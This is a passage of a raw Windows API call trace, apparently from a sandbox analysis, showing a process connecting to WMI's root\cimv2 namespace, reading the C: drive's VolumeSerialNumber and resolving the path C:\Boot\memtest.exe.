Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0190.433] WbemDefPath:IUnknown:Release (This=0x77c008) returned 0x3 [0190.433] CoGetContextToken (in: pToken=0x689e5d8 | out: pToken=0x689e5d8) returned 0x0 [0190.433] CoGetContextToken (in: pToken=0x689e9e0 | out: pToken=0x689e9e0) returned 0x0 [0190.433] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ea70 | out: ppvObject=0x689ea70*=0x0) returned 0x80004002 [0190.433] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x2 [0190.433] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x1 [0190.433] CoGetContextToken (in: pToken=0x689f368 | out: pToken=0x689f368) returned 0x0 [0190.433] CoGetContextToken (in: pToken=0x689f2c8 | out: pToken=0x689f2c8) returned 0x0 [0190.433] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738af0, riid=0x689f398*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f394 | out: ppvObject=0x689f394*=0x6738af0) returned 0x0 [0190.433] WbemDefPath:IUnknown:AddRef (This=0x6738af0) returned 0x3 [0190.433] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x2 [0190.433] WbemDefPath:IWbemPath:SetText (This=0x6738af0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0190.433] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x689f51c | out: puCount=0x689f51c*=0x0) returned 0x0 [0190.433] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x689f518*=0x0, pszText=0x0 | out: puBuffLength=0x689f518*=0x20, pszText=0x0) returned 0x0 [0190.433] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x689f518*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f518*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0190.433] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738af0, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0190.433] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x689f51c | out: puCount=0x689f51c*=0x0) returned 0x0 [0190.433] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738af0, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0190.433] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738af0, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0190.433] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x689f49c | out: puCount=0x689f49c*=0x0) returned 0x0 [0190.434] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x689f488 | out: puCount=0x689f488*=0x2) returned 0x0 [0190.434] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f484*=0x0, pszText=0x0 | out: puBuffLength=0x689f484*=0xf, pszText=0x0) returned 0x0 [0190.434] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f484*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f484*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0190.434] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f438 | out: ppv=0x689f438*=0x72015c) returned 0x0 [0190.434] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f430 | out: pAptType=0x689f430*=1) returned 0x0 [0190.434] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f434 | out: ppvObject=0x689f434*=0x0) returned 0x80004002 [0190.434] IUnknown:Release (This=0x72015c) returned 0x1 [0190.434] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689eda0 | out: ppv=0x689eda0*=0x6737088) returned 0x0 [0190.435] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737088, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689efb8 | out: ppvObject=0x689efb8*=0x0) returned 0x80004002 [0190.435] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737088, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689efcc | out: ppvObject=0x689efcc*=0x6738620) returned 0x0 [0190.435] WbemDefPath:IUnknown:Release (This=0x6737088) returned 0x0 [0190.435] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ebec | out: ppvObject=0x689ebec*=0x6738620) returned 0x0 [0190.435] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689eba8 | out: ppvObject=0x689eba8*=0x0) returned 0x80004002 [0190.435] WbemDefPath:IUnknown:AddRef (This=0x6738620) returned 0x3 [0190.435] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e504 | out: ppvObject=0x689e504*=0x0) returned 0x80004002 [0190.435] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e4b4 | out: ppvObject=0x689e4b4*=0x0) returned 0x80004002 [0190.435] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e4c0 | out: ppvObject=0x689e4c0*=0x77bff8) returned 0x0 [0190.435] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77bff8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e4c8 | out: pCid=0x689e4c8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0190.435] WbemDefPath:IUnknown:Release (This=0x77bff8) returned 0x3 [0190.435] CoGetContextToken (in: pToken=0x689e520 | out: pToken=0x689e520) returned 0x0 [0190.435] CoGetContextToken (in: pToken=0x689e928 | out: pToken=0x689e928) returned 0x0 [0190.435] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e9b8 | out: ppvObject=0x689e9b8*=0x0) returned 0x80004002 [0190.435] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x2 [0190.435] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x1 [0190.435] CoGetContextToken (in: pToken=0x689f2b0 | out: pToken=0x689f2b0) returned 0x0 [0190.435] CoGetContextToken (in: pToken=0x689f210 | out: pToken=0x689f210) returned 0x0 [0190.435] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x689f2e0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f2dc | out: ppvObject=0x689f2dc*=0x6738620) returned 0x0 [0190.436] WbemDefPath:IUnknown:AddRef (This=0x6738620) returned 0x3 [0190.436] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x2 [0190.436] WbemDefPath:IWbemPath:SetText (This=0x6738620, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0190.436] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x689f460 | out: puCount=0x689f460*=0x2) returned 0x0 [0190.436] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x689f45c*=0x0, pszText=0x0 | out: puBuffLength=0x689f45c*=0xf, pszText=0x0) returned 0x0 [0190.436] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x689f45c*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f45c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0190.436] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f460 | out: ppv=0x689f460*=0x72015c) returned 0x0 [0190.436] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f458 | out: pAptType=0x689f458*=1) returned 0x0 [0190.436] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f45c | out: ppvObject=0x689f45c*=0x0) returned 0x80004002 [0190.436] IUnknown:Release (This=0x72015c) returned 0x1 [0190.436] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f080 | out: ppv=0x689f080*=0x673d360) returned 0x0 [0190.437] WbemLocator:IUnknown:QueryInterface (in: This=0x673d360, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f298 | out: ppvObject=0x689f298*=0x0) returned 0x80004002 [0190.437] WbemLocator:IClassFactory:CreateInstance (in: This=0x673d360, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f2ac | out: ppvObject=0x689f2ac*=0x6737098) returned 0x0 [0190.437] WbemLocator:IUnknown:Release (This=0x673d360) returned 0x0 [0190.437] WbemLocator:IUnknown:QueryInterface (in: This=0x6737098, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eecc | out: ppvObject=0x689eecc*=0x6737098) returned 0x0 [0190.437] WbemLocator:IUnknown:QueryInterface (in: This=0x6737098, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ee88 | out: ppvObject=0x689ee88*=0x0) returned 0x80004002 [0190.437] WbemLocator:IUnknown:AddRef (This=0x6737098) returned 0x3 [0190.437] WbemLocator:IUnknown:QueryInterface (in: This=0x6737098, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e7e4 | out: ppvObject=0x689e7e4*=0x0) returned 0x80004002 [0190.437] WbemLocator:IUnknown:QueryInterface (in: This=0x6737098, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e794 | out: ppvObject=0x689e794*=0x0) returned 0x80004002 [0190.437] WbemLocator:IUnknown:QueryInterface (in: This=0x6737098, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e7a0 | out: ppvObject=0x689e7a0*=0x0) returned 0x80004002 [0190.437] CoGetContextToken (in: pToken=0x689e800 | out: pToken=0x689e800) returned 0x0 [0190.437] CoGetContextToken (in: pToken=0x689ec08 | out: pToken=0x689ec08) returned 0x0 [0190.437] WbemLocator:IUnknown:QueryInterface (in: This=0x6737098, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec98 | out: ppvObject=0x689ec98*=0x0) returned 0x80004002 [0190.437] WbemLocator:IUnknown:Release (This=0x6737098) returned 0x2 [0190.437] WbemLocator:IUnknown:Release (This=0x6737098) returned 0x1 [0190.437] CoGetContextToken (in: pToken=0x689f278 | out: pToken=0x689f278) returned 0x0 [0190.437] CoGetContextToken (in: pToken=0x689f1d8 | out: pToken=0x689f1d8) returned 0x0 [0190.437] WbemLocator:IUnknown:QueryInterface (in: This=0x6737098, riid=0x689f2a8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x689f2a4 | out: ppvObject=0x689f2a4*=0x6737098) returned 0x0 [0190.437] WbemLocator:IUnknown:AddRef (This=0x6737098) returned 0x3 [0190.437] WbemLocator:IUnknown:Release (This=0x6737098) returned 0x2 [0190.437] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x689f43c | out: puCount=0x689f43c*=0x2) returned 0x0 [0190.437] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=8, puBuffLength=0x689f438*=0x0, pszText=0x0 | out: puBuffLength=0x689f438*=0xf, pszText=0x0) returned 0x0 [0190.437] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=8, puBuffLength=0x689f438*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f438*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0190.438] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x689f314 | out: ppv=0x689f314*=0x6736f28) returned 0x0 [0190.438] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736f28, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x689f3a8 | out: ppNamespace=0x689f3a8*=0x674815c) returned 0x0 [0191.402] WbemLocator:IUnknown:QueryInterface (in: This=0x674815c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f244 | out: ppvObject=0x689f244*=0x781634) returned 0x0 [0191.403] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781634, pProxy=0x674815c, pAuthnSvc=0x689f294, pAuthzSvc=0x689f290, pServerPrincName=0x689f288, pAuthnLevel=0x689f28c, pImpLevel=0x689f27c, pAuthInfo=0x689f280, pCapabilites=0x689f284 | out: pAuthnSvc=0x689f294*=0xa, pAuthzSvc=0x689f290*=0x0, pServerPrincName=0x689f288, pAuthnLevel=0x689f28c*=0x6, pImpLevel=0x689f27c*=0x2, pAuthInfo=0x689f280, pCapabilites=0x689f284*=0x1) returned 0x0 [0191.403] WbemLocator:IUnknown:Release (This=0x781634) returned 0x1 [0191.403] WbemLocator:IUnknown:QueryInterface (in: This=0x674815c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f238 | out: ppvObject=0x689f238*=0x781654) returned 0x0 [0191.403] WbemLocator:IUnknown:QueryInterface (in: This=0x674815c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f234 | out: ppvObject=0x689f234*=0x781634) returned 0x0 [0191.403] WbemLocator:IClientSecurity:SetBlanket (This=0x781634, pProxy=0x674815c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0191.503] WbemLocator:IUnknown:Release (This=0x781634) returned 0x2 [0191.503] WbemLocator:IUnknown:Release (This=0x781654) returned 0x1 [0191.503] CoTaskMemFree (pv=0x77dde8) [0191.503] WbemLocator:IUnknown:Release (This=0x6736f28) returned 0x0 [0191.503] WbemLocator:IUnknown:QueryInterface (in: This=0x674815c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ee34 | out: ppvObject=0x689ee34*=0x781654) returned 0x0 [0191.504] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689edf0 | out: ppvObject=0x689edf0*=0x0) returned 0x80004002 [0191.645] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689ec0c | out: ppvObject=0x689ec0c*=0x0) returned 0x80004002 [0191.893] WbemLocator:IUnknown:AddRef (This=0x781654) returned 0x3 [0191.893] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e74c | out: ppvObject=0x689e74c*=0x0) returned 0x80004002 [0191.894] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e6fc | out: ppvObject=0x689e6fc*=0x0) returned 0x80004002 [0191.895] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e708 | out: ppvObject=0x689e708*=0x7815b4) returned 0x0 [0191.895] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7815b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e710 | out: pCid=0x689e710*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0191.895] WbemLocator:IUnknown:Release (This=0x7815b4) returned 0x3 [0191.895] CoGetContextToken (in: pToken=0x689e768 | out: pToken=0x689e768) returned 0x0 [0191.895] CoGetContextToken (in: pToken=0x689eb70 | out: pToken=0x689eb70) returned 0x0 [0191.895] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec00 | out: ppvObject=0x689ec00*=0x78163c) returned 0x0 [0191.895] WbemLocator:IRpcOptions:Query (in: This=0x78163c, pPrx=0x781654, dwProperty=2, pdwValue=0x689ec28 | out: pdwValue=0x689ec28) returned 0x80004002 [0191.895] WbemLocator:IUnknown:Release (This=0x78163c) returned 0x3 [0191.895] WbemLocator:IUnknown:Release (This=0x781654) returned 0x2 [0191.895] CoGetContextToken (in: pToken=0x689f148 | out: pToken=0x689f148) returned 0x0 [0191.895] CoGetContextToken (in: pToken=0x689f0a8 | out: pToken=0x689f0a8) returned 0x0 [0191.895] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x689f178*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x689f174 | out: ppvObject=0x689f174*=0x674815c) returned 0x0 [0191.895] WbemLocator:IUnknown:AddRef (This=0x674815c) returned 0x4 [0191.896] WbemLocator:IUnknown:Release (This=0x674815c) returned 0x3 [0191.896] WbemLocator:IUnknown:Release (This=0x674815c) returned 0x2 [0191.896] SysStringLen (param_1=0x0) returned 0x0 [0191.896] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x689f50c | out: puCount=0x689f50c*=0x0) returned 0x0 [0191.896] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x689f508*=0x0, pszText=0x0 | out: puBuffLength=0x689f508*=0x20, pszText=0x0) returned 0x0 [0191.896] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x689f508*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f508*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0191.896] CoGetContextToken (in: pToken=0x689f178 | out: pToken=0x689f178) returned 0x0 [0191.896] WbemLocator:IUnknown:AddRef (This=0x781654) returned 0x3 [0191.896] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f00c | out: ppvObject=0x689f00c*=0x781654) returned 0x0 [0191.896] WbemLocator:IUnknown:Release (This=0x781654) returned 0x3 [0191.896] WbemLocator:IUnknown:Release (This=0x781654) returned 0x2 [0191.896] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x689f510*=0x0, pszText=0x0 | out: puBuffLength=0x689f510*=0x20, pszText=0x0) returned 0x0 [0191.896] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x689f510*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f510*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0191.896] IWbemServices:GetObject (in: This=0x674815c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x689f4c4*=0x0, ppCallResult=0x0 | out: ppObject=0x689f4c4*=0x673bac8, ppCallResult=0x0) returned 0x0 [0192.393] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x689f4c4 | out: puCount=0x689f4c4*=0x2) returned 0x0 [0192.393] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x689f4c0*=0x0, pszText=0x0 | out: puBuffLength=0x689f4c0*=0xf, pszText=0x0) returned 0x0 [0192.393] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x689f4c0*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f4c0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0192.393] IWbemClassObject:Get (in: This=0x673bac8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f4c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34742c4*=0, plFlavor=0x34742c8*=0 | out: pVal=0x689f4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34742c4*=8, plFlavor=0x34742c8*=0) returned 0x0 [0192.394] SysStringByteLen (bstr="9C354B42") returned 0x10 [0192.394] SysStringByteLen (bstr="9C354B42") returned 0x10 [0192.394] IWbemClassObject:Get (in: This=0x673bac8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f4c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34742c4*=8, plFlavor=0x34742c8*=0 | out: pVal=0x689f4c8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34742c4*=8, plFlavor=0x34742c8*=0) returned 0x0 [0192.394] SysStringByteLen (bstr="9C354B42") returned 0x10 [0192.394] SysStringByteLen (bstr="9C354B42") returned 0x10 [0192.394] GetFullPathNameW (in: lpFileName="C:\\Boot\\memtest.exe", nBufferLength=0x105, lpBuffer=0x689f0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\memtest.exe", lpFilePart=0x0) returned 0x13 